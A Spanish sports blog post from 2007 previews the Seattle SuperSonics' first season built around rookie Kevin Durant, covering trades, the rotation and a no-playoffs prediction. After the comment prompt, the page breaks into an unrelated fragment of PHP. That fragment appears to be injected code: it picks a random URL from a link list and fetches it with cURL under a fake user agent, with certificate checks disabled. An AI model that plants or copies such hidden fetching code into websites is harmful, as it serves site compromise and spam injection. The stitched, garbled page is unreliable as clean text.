Seattle Supersonics: comienza la era Durant

30 de October de 2007 por Jabho

Me hubiera gustado ver la cara, de incredulidad como mínimo, de cualquier aficionado de Seattle al que le hubieran dicho que esta temporada iba empezar con Ray Allen y Rashard Lewis fuera del equipo. Pero ha pasado y, sin estos dos jugadores, empieza en Seattle la primera temporada de la era Kevin Durant.

La historia en realidad arranca la madrugada del 23 de mayo cuando el sorteo del draft le da el pick 2 a los Sonics. Cada año se espera que los primeros jugadores del draft se conviertan en estrellas de la liga, jugadores franquicia capaces de llevar a sus equipos a luchar por el anillo. No siempre pasa, pero la generación de este año ha levantado grandes expectativas en cuanto a calidad y profundidad. En la punta de lanza de esta promoción aparecían 2 nombres, Oden y Durant.

Seattle lleva dos años fuera de Playoffs. De hecho, el año pasado fueron el segundo peor equipo de la Conferencia Oeste y en verano tocaba renovar a Rashard Lewis. Con esta perspectiva, la noche del draft los Sonics se decidieron a reconstruir en torno a la estrella que llegaba y mandaron a Ray Allen a Boston a cambio de Wally, Delonte West y el pick 5 . Rashard Lewis cambió la lluvia de Seattle por el sol de Orlando gracias al contrato más importante firmado este verano (120 millones de dólares por 6 años).

Y como a rey muerto, rey puesto, en la misma noche del draft, tras la elección de Oden por parte de los vecinos de Porland, Seattle tuvo una elección sencillísima ya que, pase lo que pase, nadie reprochará nunca la elección de Durant en ese momento.

Las expectativas generadas por Durant son muy altas. Tanto que hicieron dudar a Porland. En su único año en la NCAA, en Texas, promedió 25 puntos y 11,6 rebotes. Es un jugador alto, 2.06, que puede jugar tanto de escolta como de alero, muy bueno ofensivamente, gran tirador, buen pasador y buen atleta. En los días previos al draft se le comparaba con T-Mac, que son palabras mayores. El futuro de Seattle se va a construir en torno a él, pero hay que darle tiempo.

La dirección de juego recaerá en Luke Ridnour y Delonte West. Ridnour ha jugado un año algo decepcionante ya que no ha conseguido subir el nivel de sus primeros años. Delonte puede jugar tanto de base como de escolta y con minutos y oportunidades puede hacerse con la titularidad. Es más completo que Ridnour aunque quizás menos director de juego.

En las alas, Wally Szczerbiak posiblemente acompañe a Durant como titular. Estrella venida a menos, si los tobillos le dan un respiro es un jugador que aportará experiencia y anotación desde el exterior. Jeff Green, Damien Wilkins o Gelabale completan la rotación. Green, pick 5 de este año, es un jugador completo y versátil. Puede jugar tanto de 3 como de 4 así como anotar, defender o rebotear según la ocasión. Por madurez con respecto a su promoción es uno de los candidatos a rookie del año.

Wilcox y Collison son los jugadores más importantes en el juego interior. Ninguno de los dos es un center puro y los que sí los son, Sene, Petro o Swift, no parecen ganarse la confianza del técnico. El veterano Kurt Thomas puede aportar minutos de calidad en ese puesto pero a priori la opción pasa por jugar con la pareja Wilcox-Collsion de incio. Ambos son cumplidores tanto en defensa como ataque, pero a medio plazo Seattle necesitará más si quiere aspirar a mayores cotas.

Por tanto la temporada que empieza es sin duda una temporada de transición, para intuir cuál es el techo de Durant, para intuir cuál es el techo del equipo. Con el tiempo, y si Durant cumple las expectativas, podrán aspirar a objetivos más ambiciosos. Hay muchos jugadores interesantes y margen de movimiento en lo económico para cuando llegue el momento de asaltar otras metas.

Quinteto: West, Wally, Durant, Wilcox y Collison
Sexto hombre: Green
Predicción:
Fuera de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>